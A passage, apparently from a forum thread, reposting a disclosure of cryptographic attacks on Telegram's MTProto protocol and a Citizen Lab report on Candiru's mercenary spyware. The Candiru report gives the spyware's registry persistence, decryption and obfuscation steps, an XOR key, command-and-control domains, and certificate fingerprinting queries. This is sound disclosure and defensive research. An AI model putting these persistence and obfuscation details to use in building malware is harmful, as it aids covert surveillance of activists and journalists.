  23. Security Analysis of Telegram (Symmetric Part) Overview We performed a detailed security analysis of the encryption offered by the popular Telegram messaging platform. As a result of our analysis, we found several cryptographic weaknesses in the protocol, from technically trivial and easy to exploit to more advanced and of theoretical interest. For most users, the immediate risk is low, but these vulnerabilities highlight that Telegram fell short of the cryptographic guarantees enjoyed by other widely deployed cryptographic protocols such as TLS. We made several suggestions to the Telegram developers that enable providing formal assurances that rule out a large class of cryptographic attacks, similarly to other, more established, cryptographic protocols. By default, Telegram uses its bespoke MTProto protocol to secure communication between clients and its servers as a replacement for the industry-standard Transport Layer Security (TLS) protocol. While Telegram is often referred to as an “encrypted messenger”, this level of protection is the only protection offered by default: MTProto-based end-to-end encryption, which would protect communication from Telegram employees or anyone breaking into Telegram’s servers, is only optional and not available for group chats. We thus focused our efforts on analysing whether Telegram’s MTProto offers comparable privacy to surfing the web with HTTPS. Vulnerabilities We disclosed the following vulnerabilities to the Telegram development team on 16 April 2021 and agreed with them on a disclosure on 16 July 2021: An attacker on the network can reorder messages coming from a client to the server. This allows, for example, to alter the order of “pizza” and “crime” in the sequence of messages: “I say yes to”, “all the pizzas”, “I say no to”, “all the crimes”. This attack is trivial to carry out. Telegram confirmed the behaviour we observed and addressed this issue in version 7.8.1 for Android, 7.8.3 for iOS and 2.8.8 for Telegram Desktop. An attacker can detect which of two special messages was encrypted by a client or a server under some special conditions. In particular, Telegram encrypts acknowledgement messages, i.e. messages that encode that a previous message was indeed received, but the way it handles the re-sending of unacknowledged messages leaks whether such an acknowledgement was sent and received. This attack is mostly of theoretical interest. However, cryptographic protocols are expected to rule out even such attacks. Telegram confirmed the behaviour we observed and addressed this issue in version 7.8.1 for Android, 7.8.3 for iOS and 2.8.8 for Telegram Desktop. We also studied the implementation of Telegram clients and found that three of them (Android, iOS, Desktop) contained code which – in principle – permitted to recover some plaintext from encrypted messages. For this, an attacker must send many carefully crafted messages to a target, on the order of millions of messages. This attack, if executed successfully, could be devastating for the confidentiality of Telegram messages. Luckily, it is almost impossible to carry out in practice. In particular, it is mostly mitigated by the coincidence that certain metadata in Telegram is chosen randomly and kept secret. The presence of these implementation weaknesses, however, highlights the brittleness of the MTProto protocol: it mandates that certain steps are done in a problematic order (see discussion below), which puts significant burden on developers (including developers of third-party clients) who have to avoid accidental leakage. The three official Telegram clients which exhibit non-ideal behaviour are evidence that this is a high burden. Telegram confirmed the attacks and rolled out fixes to all three affected clients in June. Telegram also awarded a “bug bounty” for these vulnerabilities. We also show how an attacker can mount an “attacker-in-the-middle” attack on the initial key negotiation between the client and the server. This allows an attacker to impersonate the server to the client, allowing to break confidentiality and integrity of the communication. Luckily, this attack is also quite difficult to carry out, as it requires sending billions of messages to a Telegram server within minutes. However, it highlights that while users are required to trust Telegram’s servers, the security of those servers and their implementations cannot be taken for granted. Telegram confirmed the behaviour and implemented some server-side mitigations. In addition, from version 7.8.1 for Android, 7.8.3 for iOS and 2.8.8 for Telegram Desktop client apps support an RSA-OAEP+ variant. We were informed by the Telegram developers that they do not do security or bugfix releases except for immediate post-release crash fixes. The development team also informed us that they did not wish to issue security advisories at the time of patching, nor commit to release dates for specific fixes. As a consequence, the fixes were rolled out as part of regular Telegram updates. Formal Security Analysis The central result of our investigation, however, is that Telegram’s MTProto can provide a confidential and integrity-protected channel when the changes we suggested are adopted by the Telegram developers. As mentioned above, the Telegram developers communicated to us that they did adopt these changes. Telegram awarded a cash price for this analysis to stimulate future analysis. However, this result comes with significant caveats. Cryptographic protocols like MTProto are built from cryptographic building blocks such as hash functions, block ciphers and public-key encryption. In a formal security analysis, the security of the protocol is reduced to the security of its building blocks. This is no different to arguing that a car is road safe if its tires, brakes and indicator lights are fully functional. In the case of Telegram, the security requirements on the building blocks are unusual. Because of this, these requirements have not been studied in previous research. This is somewhat analogous to making assumptions about a car’s brakes that have not been lab-tested. Other cryptographic protocols such as TLS do not have to rely on these sort of special assumptions. A further caveat of these findings is that we only studied three official Telegram clients and no third-party clients. However, some of these third-party clients have substantial user bases. Here, the brittleness of the MTProto protocol is a cause for concern if the developers of these third-party clients are likely to make mistakes in implementing the protocol in a way that avoids, e.g. the timing leaks mentioned above. Alternative design choices for MTProto would have made the task significantly easier for the developers. Paper Martin R. Albrecht, Lenka Mareková, Kenneth G. Paterson, Igors Stepanovs: Four Attacks and a Proof for Telegram. To appear at IEEE Symposium on Security and Privacy 2022. Team Martin R. Albrecht (Information Security Group, Royal Holloway, University of London) Lenka Mareková (Information Security Group, Royal Holloway, University of London) Kenneth G. Paterson (Applied Cryptography Group, ETH Zurich) Igors Stepanovs (Applied Cryptography Group, ETH Zurich) A Somewhat Opinionated Discussion “Don’t roll your own crypto” is a common mantra issued when a cryptographic vulnerability is found in some protocol. Indeed, Telegram has been the recipient of unsolicited advice of this nature. The problem with this mantra is, of course, that it sounds like little more than gatekeeping. Clearly, some people need to roll “their own crypto” for cryptography to be rolled at all. However, despite the gatekeeping flavour, there is a rationale behind this advice. Standard cryptographic protocols have received attention from analysts and new protocols are developed in parallel with a proof that roughly says: “No adversary with these capabilities can break the given well-defined security goals unless one of the underlying primitives – a block cipher, a hash function etc – has a weakness.“ Of course, proofs can have bugs too, but this process significantly reduces the risk of catastrophic failure. Two of our attacks described above serve to illustrate that some behaviours exhibited by Telegram clients and servers are undesirable (permitting reordering of some messages, encrypting twice under the same state in some corner case). The apparent need to make non-standard assumptions on the underlying building blocks in our proofs (which we do not know how to avoid) further illustrates that some design choices made in MTProto are more risky than they need to be. In other words, this part of our paper – “Two Attacks and a Proof” so to speak – illustrates the implied rationale of the above mentioned mantra: proofs help to reduce the attack surface. But there is another leg of the “don’t roll your own crypto” mantra: it can be surprisingly tricky to implement cryptographic algorithms in a way that they leak no secret information, e.g. through timing side channels. Proofs only cover what is in their model. Two of our attacks are timing attacks and thus “outside the model”. Our proof essentially states that it is, in principle, possible to implement MTProto in a way that is secure but does not cover how easy or hard it is or how to do it at all. Here, two recurring “anti-patterns” in MTProto’s design make it tricky to implement the protocol securely. First, MTProto opts to protect the integrity of plaintexts rather than ciphertexts. This is the difference between Encrypt-and-MAC and Encrypt-then-MAC. It might seem natural to protect the integrity of the part that you care about – the plaintext – but doing it this way around means that a receiver must first process an incoming ciphertext with their secret key (i.e. decrypt it) before being able to verify that the ciphertext has not been tampered with. In other words, the receiver must perform a computation involving untrusted data – the received ciphertext – and their decryption key. This can be done in a secure manner, but Encrypt-then-MAC completely sidesteps the issue by first checking whether the ciphertext was tampered with (i.e. checking the MAC on the ciphertext), and only then decrypting. Second, but related to the first point, block ciphers process data in blocks of e.g. 16 bytes. Since data may have an arbitrary byte length, there will be some bytes left over that MTProto fills with random garbage (which is good). Now, since Telegram protects the integrity of plaintexts instead of ciphertexts, the question arises: compute the MAC over the plaintext with or without the padding? The original design decision was “without padding”, presumably because the designers did not see a need to protect useless random padding. The remaining two of our attacks exploit this behaviour. As mentioned above, we break – in a completely impractical way! – the initial key exchange between the client and the server. Here, we exploit that MTProto attempts to add integrity inside RSA encryption by including a hash of the payload but excluding the added random padding. This is like a homegrown variant of RSA-OAEP. The problem with this approach is that the receiver must – after decryption – figure out where the payload ends and where the padding starts. This means parsing the payload before being able to check its integrity. Furthermore, depending on the result of this parsing, more or less data may be fed into the hash function for integrity checking, which in turn produces slightly shorter or longer running times (our actual attack proceeds differently, we are merely illustrating the principle here while avoiding many details). Our second attack goes for the one place where MTProto does indeed also protect useless random padding, but the processing in some clients behaves as if this was not the case. In 2015 Jakob Jakobsen and Claudio Orlandi gave an attack on the IND-CCA security of the previous version of MTProto. As a result of this, MTProto 2.0, the current version, now also protects the integrity of padding bytes. Thus, the logic now could be: (a) decrypt and then immediately (b) check integrity. (This, too, isn’t without its pitfalls. For example, when do you know that you have enough data to run the integrity check? Parsing some length field first, for example, to establish this could again lead to attacks.) However, we found that three official Telegram clients do additional processing on the decrypted data before step (b), processing that is necessary in MTProto 1.0 (where padding and plaintext data needed to be separated before checking integrity) but not in MTProto 2.0 (where the integrity of everything is protected). We exploit – again in a completely impractical way! – this behaviour in our attacks (but we also need to combine it with the previous attack to make it all come together). So, again, the original decision not to protect some useless random bytes in MTProto 1.0 required the receiver to decide which bytes are useless and which aren’t before checking their integrity, and three official Telegram clients have carried this behaviour forward into MTProto 2.0. As an aside, Jakobsen and Orlandi wrote: “We stress that this is a theoretical attack on the definition of security and we do not see any way of turning the attack into a full plaintext-recovery attack.” Similarly, the Telegram “FAQ for the Technically Inclined (MTProto v.1.0)” provides the following analogy: “A postal worker could write ‘Haha’ (using invisible ink!) on the outside of a sealed package that he delivers to you. It didn’t stop the package from being delivered, it doesn’t allow them to change the contents of the package, and it doesn’t allow them to see what was inside.” In hindsight, we think that this is incorrect. As explained above, our timing side channels essentially exploit this behaviour in order to do message recovery (but we need to “chain” two “exploits” to make it work, even ignoring practicality concerns). In summary, MTProto protects the integrity of plaintexts rather than ciphertexts, which necessitates operating with a decryption key on untrusted data. Moreover, MTProto in several places opted (or at least used to opt) to require additional parsing of decrypted data before its integrity could be checked by only protecting the payload without padding. This produces an opportunity for timing side-channel attacks; an opportunity that could be completely removed by using a standard authenticated encryption scheme (roughly speaking, Encrypt-then-MAC with key separation has been shown to be a decent such scheme, but faster dedicated schemes exist). Finally, given that Telegram’s ecosystem is serviced also by many third-party clients, the “brittleness” of the design or the presence of “footguns” means that even if the developers of the official clients manage to take great care to avoid timing leaks, those are difficult to rule out for third-party clients. Q & A What about IGE? Telegram uses the little-known Infinite Garble Extension (IGE) block cipher mode in place of more standard alternatives. While claims about its infinite error propagation have been disproven, our proofs show that its use in the symmetric part of MTProto is no more problematic than if CBC mode was used. However, its similarity with CBC also means it is vulnerable to manipulation if some bits of plaintext are known. Indeed, we use this property in combination with the timing side channel described earlier. What about length extension attacks? MTProto makes heavy use of plain SHA-256, both in deriving keys and calculating the MAC, which on first look appears as the kind of use that would lead to length extension attacks. However, as our proofs show, MTProto manages to sidestep this particular issue because of its plaintext encoding format which mandates the presence of certain metadata in the first block. Did we really break IND-CPA? Above, we wrote: An attacker can detect which of two special messages was encrypted by a client or a server under some special conditions. In particular, Telegram encrypts acknowledgement messages, i.e. messages that encode that a previous message was indeed received, but the way it handles the re-sending of unacknowledged messages leaks whether such an acknowledgement was sent and received. This attack is mostly of theoretical interest. However, cryptographic protocols are expected to rule out even such attacks. Telegram confirmed the behaviour we observed and addressed this issue in version 7.8.1 for Android, 7.8.3 for iOS and 2.8.8 for Telegram Desktop. Telegram wrote: MTProto never produces the same ciphertext, even for messages with identical content, because MTProto is stateful and msg_id is changed on every encryption. If one message is re-sent on the order of 2^64 times, MTProto can transmit the same ciphertext for the same message on two of these re-sendings. However, it would not be correct to claim that retransmission over the network of the same ciphertext for a message that was previously sent is a violation of IND-CPA security because otherwise any protocol over TCP wouldn’t be IND-CPA secure due to TCP retransmissions. To facilitate future research, each message that is re-sent by Telegram apps is now either wrapped in a new container or re-sent with a new msg_id. We have already addressed this in the latest version of our write-up (which we shared with the Telegram developers on 15 July 2021). We reproduce that part below, slightly edited for readability. If a message is not acknowledged within a certain time in MTProto, it is re-encrypted using the same msg_id and with fresh random padding. While this appears to be a useful feature and a mitigation against message deletion, it enables attacks in the IND-CPA setting, as we explain next. As a motivation, consider a local passive adversary that tries to establish whether R responded to I when looking at a transcript of three ciphertexts (c_{I, 0}, c_{R}, c_{I, 1}), where c_{u} represents a ciphertext sent from u. In particular, it aims to establish whether c_{R} encrypts an automatically generated acknowledgement, we will use “ACK” below to denote this, or a new message from R. If c_{I, 1} is a re-encryption of the same message as c_{I, 0}, re-using the state, this leaks that bit of information about c_{R}. Note that here we are breaking the confidentiality of the ciphertext carrying “ACK”. In addition to these encrypted acknowledgement messages, the underlying transport layer, e.g. TCP, may also issue unencrypted ACK messages or may resend ciphertexts as is. The difference between these two cases is that in the former case the acknowledgement message is encrypted, in the latter it is not. For completeness, note that Telegram clients do not resend cached ciphertext blobs when unacknowledged, but re-encrypt the underlying message under the same state but with fresh random padding. These pararagraphs are then followed by a semi-formal write-up of the attack. Sursa: https://mtpsym.github.io/
  24. Hooking CandiruAnother Mercenary Spyware Vendor Comes into Focus By Bill Marczak, John Scott-Railton, Kristin Berdan, Bahr Abdul Razzak, and Ron Deibert July 15, 2021 Summary Candiru is a secretive Israel-based company that sells spyware exclusively to governments. Reportedly, their spyware can infect and monitor iPhones, Androids, Macs, PCs, and cloud accounts. Using Internet scanning we identified more than 750 websites linked to Candiru’s spyware infrastructure. We found many domains masquerading as advocacy organizations such as Amnesty International, the Black Lives Matter movement, as well as media companies, and other civil-society themed entities. We identified a politically active victim in Western Europe and recovered a copy of Candiru’s Windows spyware. Working with Microsoft Threat Intelligence Center (MSTIC) we analyzed the spyware, resulting in the discovery of CVE-2021-31979 and CVE-2021-33771 by Microsoft, two privilege escalation vulnerabilities exploited by Candiru. Microsoft patched both vulnerabilities on July 13th, 2021. As part of their investigation, Microsoft observed at least 100 victims in Palestine, Israel, Iran, Lebanon, Yemen, Spain, United Kingdom, Turkey, Armenia, and Singapore. Victims include human rights defenders, dissidents, journalists, activists, and politicians. We provide a brief technical overview of the Candiru spyware’s persistence mechanism and some details about the spyware’s functionality. Candiru has made efforts to obscure its ownership structure, staffing, and investment partners. Nevertheless, we have been able to shed some light on those areas in this report. 1. Who is Candiru? The company known as “Candiru,” based in Tel Aviv, Israel, is a mercenary spyware firm that markets “untraceable” spyware to government customers. Their product offering includes solutions for spying on computers, mobile devices, and cloud accounts. Figure 1: A distinctive mural of five men with empty heads wearing suits and bowler hats is displayed in this “Happy Hour” photo a previous Candiru office posted on Facebook by a catering company. A Deliberately Opaque Corporate structure Candiru makes efforts to keep its operations, infrastructure, and staff identities opaque to public scrutiny. Candiru Ltd. was founded in 2014 and has undergone several name changes (see: Table 1). Like many mercenary spyware corporations, the company reportedly recruits from the ranks of Unit 8200, the signals intelligence unit of the Israeli Defence Forces. While the company’s current name is Saito Tech Ltd, we will refer to them as “Candiru” as they are most well known by that name. The firm’s corporate logo appears to be a silhouette of the reputedly-gruesome Candiru fish in the shape of the letter “C.” Company name Date of registration Possible meaning Saito Tech Ltd. (סאייטו טק בעיימ) 2020 “Saito” is a town in Japan Taveta Ltd. (טאבטה בעיימ) 2019 “Taveta” is a town in Kenya Grindavik Solutions Ltd. (גרינדוויק פתרונות בעיימ) 2018 “Grindavik” is a town in Iceland DF Associates Ltd. (ד. אפ אסוסיאייטס בעיימ) 2017 ? Candiru Ltd. (קנדירו בעיימ) 2014 A parasitic freshwater fish Table 1: Candiru’s corporate registrations over time Candiru has at least one subsidiary: Sokoto Ltd. Section 5 provides further documentation of Candiru’s corporate structure and ownership. Reported Sales and Investments According to a lawsuit brought by a former employee, Candiru had sales of “nearly $30 million,” within two years of its founding. The firm’s reported clients are located in “Europe, the former Soviet Union, the Persian Gulf, Asia and Latin America.” Additionally, reports of possible deals with several countries have been published: Uzbekistan: In a 2019 presentation at the Virus Bulletin security conference, a Kaspersky Lab researcher stated that Candiru likely sold its spyware to Uzbekistan’s National Security Service. Saudi Arabia & the UAE: The same presentation also mentioned Saudi Arabia and the UAE as likely Candiru customers. Singapore: A 2019 Intelligence Online report mentions that Candiru was active in soliciting business from Singapore’s intelligence services. Qatar: A 2020 Intelligence Online report notes that Candiru “has become closer to Qatar.” A company linked to Qatar’s sovereign wealth fund has invested in Candiru. No information on Qatar-based customers has yet emerged, Candiru’s Spyware Offerings A leaked Candiru project proposal published by TheMarker shows that Candiru’s spyware can be installed using a number of different vectors, including malicious links, man-in-the-middle attacks, and physical attacks. A vector named “Sherlock” is also offered, that they claim works on Windows, iOS, and Android. This may be a browser-based zero-click vector. Figure 2: Infection vectors offered by Candiru. Like many of its peers, Candiru appears to license its spyware by number of concurrent infections, which reflects the number of targets that can be under active surveillance at any one instant in time. Like NSO Group, Candiru also appears to restrict the customer to a set of approved countries. The €16 million project proposal allows for an unlimited number of spyware infection attempts, but the monitoring of only 10 devices simultaneously. For an additional €1.5M, the customer can purchase the ability to monitor 15 additional devices simultaneously, and to infect devices in a single additional country. For an additional €5.5M, the customer can monitor 25 additional devices simultaneously, and conduct espionage in five more countries. Figure 3: Proposal for a Candiru Customer indicating number of concurrent infections under a given contract. The fine print in the proposal states that the product will operate in “all agreed upon territories, ”then mentions a list of restricted countries including the US, Russia, China, Israel and Iran. This same list of restricted countries has previously been mentioned by NSO Group. Nevertheless, Microsoft observed Candiru victims in Iran, suggesting that in some situations, products from Candiru do operate in restricted territories. In addition, targeting infrastructure disclosed in this report includes domains masquerading as the Russian postal service. The proposal states that the spyware can exfiltrate private data from a number of apps and accounts including Gmail, Skype, Telegram, and Facebook. The spyware can also capture browsing history and passwords, turn on the target’s webcam and microphone, and take pictures of the screen. Capturing data from additional apps, such as Signal Private Messenger, is sold as an add-on. Figure 4: Customers can pay additional money to capture data from Signal. For a further additional €1.5M fee, customers can purchase a remote shell capability, which allows them full access to run any command or program on the target’s computer. This kind of capability is especially concerning, given that it could also be used to download files, such as planting incriminating materials, onto an infected device. 2. Finding Candiru’s Malware In The Wild Using telemetry data from Team Cymru, along with assistance from civil society partners, the Citizen Lab was able to identify a computer that we suspected contained a persistent Candiru infection. We contacted the owner of the computer, a politically active individual in Western Europe, and arranged for the computer’s hard drive to be imaged. We ultimately extracted a copy of Candiru’s spyware from the disk image. While analysis of the extracted spyware is ongoing, this section outlines initial findings about the spyware’s persistence Persistence Candiru’s spyware was persistently installed on the computer via COM hijacking of the following registry key: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Normally, this registry key’s value points to the benign Windows Management Instrumentation wmiutils.dll file, but the value on the infected computer had been modified to point to a malicious DLL file that had been dropped inside the Windows system folder associated with the Japanese input method (IMEJP) C:\WINDOWS\system32\ime\IMEJP\IMJPUEXP.DLL. This folder is benign and included in a default install of Windows 10, but IMJPUEXP.DLL is not the name of a legitimate Windows component. When Windows boots, it automatically loads the Windows Management Instrumentation service, which involves looking up the DLL path in the registry key, and then invoking the DLL. Loading the Spyware’s Configuration The IMJPUEXP DLL file has eight blobs in the PE resources section with identifiers 102, 103, 105, 106, 107, 108, 109, 110. The DLL decrypts these using an AES key and IV that are hardcoded in the DLL. Decryption is via Windows CryptoAPI, using AES-256-CBC. Of particular note is resource 102, which contains the path to the legitimate wmiutils.dll, which is loaded after the spyware, ensuring that the COM hijack does not disrupt normal Windows functionality. Resource 103 points to a file AgentService.dat in a folder created by the spyware, C:\WINDOWS\system32\config\spp\Licenses\curv\config\tracing\. Resource 105 points to a second file in the same directory, KBDMAORI.dat. IMJPUEXP.DLL decrypts and loads the AgentService.dat file whose path is in resource 103, using the same AES key and IV, and decompresses it via zlib. AgentService.dat file then loads the file in resource 105, KBDMAORI.dat, using a second AES key and IV hardcoded in AgentService.dat, and performs the decryption using a statically linked OpenSSL. Decrypting KBDMAORI.DAT yields a file with a series of nine encrypted blobs, each prefixed with an 8-byte little-endian length field. Each blob is encrypted with the same AES key and IV used to decrypt KBDMAORI.DAT, and is then zlib compressed. The first four encrypted blobs appear to be DLLs from the Microsoft Visual C++ redistributable: vcruntime140.dll, msvcp140.dll, ucrtbase.dll, concrt140.dll. The subsequent blobs are part of the spyware, including components that are apparently called Internals.dll and Help.dll. Both the Microsoft DLLs and the spyware DLLs in KBDMAORI.DAT are lightly obfuscated. Reverting the following modifications makes the files valid DLLs: The first two bytes of the file (MZ) have been zeroed. The first 4 bytes of NT header (\x50\x45\x00\x00) have been zeroed. The first 2 bytes of the optional header (\x0b\x02) have been zeroed. The strings in the import directory have been XOR obfuscated, using a 48-byte XOR key hardcoded in AgentService.dat: 6604F922F90B65F2B10CE372555C0A0C0C5258B6842A83C7DC2EE4E58B363349F496E6B6A587A88D0164B74DAB9E6B58 The final blob in KBDMAORI.DAT is the spyware’s configuration in JSON format. The configuration is somewhat obfuscated, but clearly contains Base64 UTF-16 encoded URLs for command-and-control. Figure 5: The obfuscated spyware’s C&C configuration in JSON format. The C&C servers in the configuration are: https://msstore[.]io https://adtracker[.]link https://cdnmobile[.]io All three domain names pointed to 185.181.8[.]155. This IP address was connected to three other IPs that matched our Candiru fingerprint CF1 (Section 3). Spyware Functionality We are still reversing most of the spyware’s functionality, but Candiru’s Windows payload appears to include features for exfiltrating files, exporting all messages saved in the Windows version of the popular encrypted messaging app Signal, and stealing cookies and passwords from Chrome, Internet Explorer, Firefox, Safari, and Opera browsers. The spyware also makes use of a legitimate signed third-party driver, physmem.sys: c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d Microsoft’s analysis also established that the spyware could send messages from logged-in email and social media accounts directly on the victim’s computer. This could allow malicious links or other messages to be sent directly from a compromised user’s computer. Proving that the compromised user did not send the message could be quite challenging. 3. Mapping Candiru’s Command & Control Infrastructure To identify the websites used by Candiru’s spyware, we developed four fingerprints and a new Internet scanning technique. We searched historical data from Censys and conducted our own scans in 2021. This led us to identify at least 764 domain names that we assess with moderate-high confidence to be used by Candiru and its customers. Examination of the domain names indicates a likely interest in targets in Asia, Europe, the Middle East, and North America. Additionally, based on our analysis of Internet scanning data, we believe that there are Candiru systems operated from Saudi Arabia, Israel, UAE, Hungary, and Indonesia, among other countries. OPSEC Mistake by Candiru Leads to their Infrastructure Using Censys, we found a self-signed TLS certificate that included the email address “amitn@candirusecurity.com”. We attributed the candirusecurity[.]com domain name to Candiru Ltd, because a second domain name (verification[.]center) was registered in 2015 with a candirusecurity[.]com email address and a phone number (+972-54-2552428) listed by Dun & Bradstreet as the fax number for Candiru Ltd, also known as Saito Tech Ltd. Figure 6: This Candiru certificate we found on Censys was the starting point of our analysis. Censys data records that a total of six IP addresses returned this certificate: 151.236.23[.]93, 69.28.67[.]162, 176.123.26[.]67, 52.8.109[.]170, 5.135.115[.]40, 185.56.89[.]66. The latter four of these IP addresses subsequently returned another certificate, which we fingerprinted (Fingerprint CF1) based on distinctive features. We searched Censys data for this fingerprint. SELECT parsed.fingerprint_sha256 FROM`censys-io.certificates_public.certificates` WHERE parsed.issuer_dn IS NULL AND parsed.subject_dn IS NULL AND parsed.validity.length = 8639913600 AND parsed.extensions.basic_constraints.is_ca Table 2: Fingerprint CF1 We found 42 certificates on Censys matching CF1. We observed that six IPs matching CF1 certificates later returned certificates that matched a second fingerprint we devised, CF2. The CF2 fingerprint is based on certificates that match those generated by a “Fake Name” generator. We first ran an SQL query on Censys data for the fingerprint, and then filtered by a list of fake names. SELECT parsed.fingerprint_sha256, parsed.subject_dn FROM`censys-io.certificates_public.certificates` WHERE (parsed.subject_dn = parsed.issuer_dn AND REGEXP_CONTAINS (parsed.subject_dn, r"^O=[A-Z][a-z]+,,? CN=[a-z]+\.(com|net|org)+$") AND parsed.extensions.basic_constraints.is_ca Table 3: Fingerprint CF2 SQL Query. The SQL query yielded 572 results. We filtered the results, requiring the TLS certificate’s organization in the parsed.subject_dn field to contain an entry from the list of 475 last names in the Perl Data-Faker module. We suspect that Candiru is using either this Perl module, or another module that uses the same word list, to generate fake names for TLS certificates. Neither the Perl Data-Faker module, nor other similar modules (e.g., the Ruby Faker Gem, or the PHP Faker module) appear to have built-in functionality for generating fake TLS certificates. Thus, we suspect that the TLS certificate generation code is custom code written by Candiru. After filtering, we found 542 matching certificates. We then developed an HTTP fingerprint, called BRIDGE, with which we scanned the Internet and built a third TLS fingerprint, CF3. We are keeping the BRIDGE and CF3 fingerprints confidential for now in order to maintain visibility into Candiru’s infrastructure. Overlap with CHAINSHOT One of the IPs that matched our CF1 fingerprint, 185.25.50[.]194, was pointed to by dl.nmcyclingexperience[.]com, which is mentioned as a final URL of a spyware payload delivered by the CHAINSHOT exploit kit in a 2018 report. CHAINSHOT is believed to be linked to Candiru, though no public reports have outlined the basis for this attribution, until now. Kaspersky has observed UAE hacking group Stealth Falcon using CHAINSHOT, as well as an Uzbekistan-based customer that they call SandCat. While numerous analyses have focused on various CHAINSHOT exploitation techniques, we have not seen any public work that examines Candiru’s final Windows payload. Overlap with Google TAG Research On 14 July 2021, Google’s Threat Analysis Group (TAG) published a report that mentions two Chrome zero-day exploits that TAG observed used against targets (CVE-2021-21166 and CVE-2021-30551). The report mentions nine websites that Google determined were used to distribute the exploits. Eight of these websites pointed to IP addresses that matched our CF3 Candiru fingerprint. We thus believe that the attacks that Google observed involving these Chrome exploits were linked to Candiru. Google also linked a further Microsoft Office exploit they observed (CVE-2021-33742) to the same operator. Targeting Themes Examination of Candiru’s targeting infrastructure permits us to make guesses about the location of potential targets, and topics and themes that Candiru operators believed that targets would find relevant and enticing. Some of the themes strongly suggest that the targeting likely concerned civil society and political activity. This troubling indicator matches with Microsoft’s observation of the extensive targeting of members of civil society, academics, and the media with Candiru’s spyware. We observed evidence of targeting infrastructure masquerading as media, advocacy organizations, international organizations, and others (see: Table 4). We found many aspects of this targeting concerning, such as the domain blacklivesmatters[.]info, which may be used to target individuals interested in or affiliated with this movement. Similarly, infrastructure masquerading as Amnesty International and Refugee International are troubling, as are lookalike domains for the United Nations, World Health Organization, and other international organizations. We also found the targeting theme of gender studies (e.g. womanstudies[.]co & genderconference[.]org) to be particularly interesting and warranting further investigation. Theme Example Domains Masquerading as International Media cnn24-7[.]online CNN dw-arabic[.]com Deutsche Welle euro-news[.]online Euronews rasef22[.]com Raseef22 france-24[.]news France 24 Advocacy Organizations amnestyreports[.]com Amnesty International blacklivesmatters[.]info Black Lives Matter movement refugeeinternational[.]org Refugees International Gender Studies womanstudies[.]co Academic theme genderconference[.]org Academic conference Tech Companies cortanaupdates[.]com Microsoft googlplay[.]store Google apple-updates[.]online Apple amazon-cz[.]eu Amazon drpbx-update[.]net Dropbox lenovo-setup[.]tk Lenovo konferenciya-zoom[.]com Zoom zcombinator[.]co Y Combinator Social Media linkedin-jobs[.]com LinkedIn faceb00k-live[.]com Facebook minstagram[.]net Instagram twitt-live[.]com Twitter youtubee[.]life YouTube Popular Internet Websites wikipediaathome[.]net Wikipedia International Organizations osesgy-unmissions[.]org Office of the Special Envoy of the Secretary-General for Yemen un-asia[.]co United Nations whoint[.]co World Health Organization Government Contractors vesteldefnce[.]io Turkish defense contractor vfsglobal[.]fr Visa services provider Table 4: Some targeting themes observed in Candiru domains. A range of targeting domains appears to be reasonably country-specific (see: Table 5). We believe these domain themes indicate likely countries of targets and not necessarily the countries of the operators themselves. Country Example Domain What is this likely impersonating? Indonesia indoprogress[.]co Left-leaning Indonesian publication Russia pochtarossiy[.]info Russian postal service Czechia kupony-rohlik[.]cz Czech grocery Armenia armenpress[.]net State news agency of Armenia Iran tehrantimes[.]org English-language daily newspaper in Iran Turkey yeni-safak[.]com Turkish newspaper Cyprus cyprusnet[.]tk A portal providing information on Cypriot businesses. Austria oiip[.]org Austrian Institute for International Affairs Palestine lwaeh-iteham-alasra[.]com Website that publishes Israeli court indictments of Palestinian prisoners Saudi Arabia mbsmetoo[.]com Website for “an international campaign to support the case of Jamal Khashoggi” and other cases against Saudi Crown Prince Mohammed bin Salman Slovenia total-slovenia-news[.]net English-language Slovenian news site. Table 5: Some country themes observed in Candiru domains. 4. A Saudi-Linked Cluster? A document was uploaded from Iran to VirusTotal that used an AutoOpen Macro to launch a web browser, and navigated the browser to the URL https://cuturl[.]space/lty7uw, which VirusTotal recorded as redirecting to a URL, https://useproof[.]cc/1tUAE7A2Jn8WMmq/api, that mentions a domain we linked to Candiru, useproof[.]cc. The domain useproof[.]cc pointed to 109.70.236.107, which matched our fingerprint CF3. The document was blank, except for a graphic containing the text “Minister of Foreign Affairs of the Islamic Republic of Iran.” Figure 7: A document that loads a Candiru URL was uploaded to VirusTotal from Iran, and includes a header image referencing the Minister of Foreign Affairs. We fingerprinted the behaviour of cuturl[.]space and traced it to five other URL shorteners: llink[.]link, instagrarn[.]co, cuturl[.]app, url-tiny[.]co, and bitly[.]tel. Interestingly, several of these domains were flagged by a researcher at ThreatConnect in two tweets, based on suspicious characteristics of their registration. We suspect that the AutoOpen format and the URL shorteners may be unique to a particular Candiru client. A Saudi Twitter user contacted us and reported that Saudi users active on Twitter were receiving messages with suspicious short URLs, including links to the domain name bitly[.]tel. Given this, we suspect that the URL shorteners may be linked to Saudi Arabia. 5. Additional Corporate Details for Candiru Ya’acov Weitzman (ויצמן יעקב) and Eran Shorer (שורר ערן) founded Candiru in 2014. Isaac Zack (זק יעקב), also reportedly an early investor in NSO Group, became the largest shareholder of Candiru less than two months after its founding and took a seat on its board of directors. In January 2019, Tomer Israeli (ישראלי תומר) first appeared in corporate records as Candiru’s “director of finance,” and Eitan Achlow (אחלאו איתן) was named CEO. A number of independent investors appear to have funded Candiru’s operations over the years. As of Candiru’s notice of allotment of shares filed in February 2021 with the Israeli Corporations Authority, Zack, Shorer, and Weitzman are still the largest shareholders. Three organizations are the next largest shareholders: Universal Motors Israel LTD (corporate registration 511809071), ESOP management and trust services (איסופ שירותי ניהול) corporate registration 513699538, and Optas Industry Ltd. ESOP (corporate registration no. 513699538) is an Israeli company that provides employee stock program administrative services to corporate clients. We do not know whether ESOP holds its stock in trust for certain Candiru employees. Optas Industry Ltd. is a Malta-based private equity firm (registration number C91267, shareholder Leonard Joseph O’Brien, directors are O’Brien and Michael Ellul, incorporated 28 March 2019). It has been reported that for a decade O’Brien has served as head of investment and a board member of the Gulf Investment Fund, and that the sovereign Qatar Investment Authority has a 12% stake in the Gulf Investment Fund (through a subsidiary, Qatar Holding). Universal Motors Israel (company registration no. 511809071) as an investor (including a seat on Candiru’s board) is curious considering their primary business is the distribution of new and used automobiles. Besides Amit Ron (רון עמית), the Universal Motors Israel representative, Candiru’s board as of December 2020 includes Isaac Zack, Ya’acov Weitzman, and Eran Shorer. In addition to the involvement of Zack, Candiru shares other points of 